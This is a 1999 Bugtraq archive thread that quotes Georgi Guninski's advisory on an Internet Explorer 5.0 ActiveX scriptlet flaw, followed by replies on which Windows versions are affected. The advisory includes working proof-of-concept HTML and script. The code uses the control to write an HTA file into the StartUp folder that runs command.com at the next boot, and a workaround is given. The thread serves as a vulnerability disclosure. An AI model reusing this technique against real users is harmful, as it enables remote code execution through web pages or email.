Bugtraq mailing list archives

Re: IE 5.0 allows executing programs

From: atodosic () UBISOFT QC CA (Andrej Todosic)
Date: Tue, 24 Aug 1999 22:00:48 -0400


win2000 rc1 build 2072 ie5 doesnt work. ie5.0.2919.800

it reports
security problem and this active x control doesnt allow objects of type blah
blah blah

-----Original Message-----
From: Bugtraq List [mailto:BUGTRAQ () SECURITYFOCUS COM]On Behalf Of
Micheal Patterson
Sent: August 23, 1999 2:03 AM
To: BUGTRAQ () SECURITYFOCUS COM
Subject: Re: IE 5.0 allows executing programs

This apparently works on NT 4.0 sp5 and IE 5.00.2014.0216IC as well..

Micheal Patterson
pattersonm () psi com

----- Original Message -----
From: Georgi Guninski <joro () NAT BG>
To: <BUGTRAQ () SECURITYFOCUS COM>
Sent: Saturday, August 21, 1999 11:17 AM
Subject: IE 5.0 allows executing programs

Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or  indirect use of the
information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.

Description:

Internet Explorer 5.0 under Windows 95/98 (do not know about NT)
allows executing arbitrary programs on the local machine by creating and
overwriting local files and putting content in them.

Details:

The problem is the ActiveX Control "Object for constructing type
libraries for scriptlets".
It allows creating and overwriting local files, and more putting content
in them.
There is some unneeded information in the file, but part of the content
may be chosen.
So, an HTML Application file may be created, feeded with an exploit
information and written to the StartUp folder.
The next time the user reboots (which may be forced), the code in the
HTML Application file will be executed.
This vulnerability can be exploited via email.

Demonstration is available at: http://www.nat.bg/~joro/scrtlb.html

Workaround:
Disable Active Scripting
or
Disable Run ActiveX Controls and plug-ins

The code is:

<object id="scr"
   classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"

</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="<object id='wsh'

classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
'Written

by Georgi Guninski
http://www.nat.bg/~joro&apos;);wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>

Regards,
Georgi Guninski
http://www.nat.bg/~joro

Current thread:

Re: IE 5.0 allows executing programs STEVENS, Eric (Aug 23)
- Re: IE 5.0 allows executing programs Bronek Kozicki (Aug 26)
- <Possible follow-ups>
- Re: IE 5.0 allows executing programs Russ (Aug 24)
  - Local DoS in FreeBSD L. Sassaman (Aug 26)
- Re: IE 5.0 allows executing programs Andrej Todosic (Aug 24)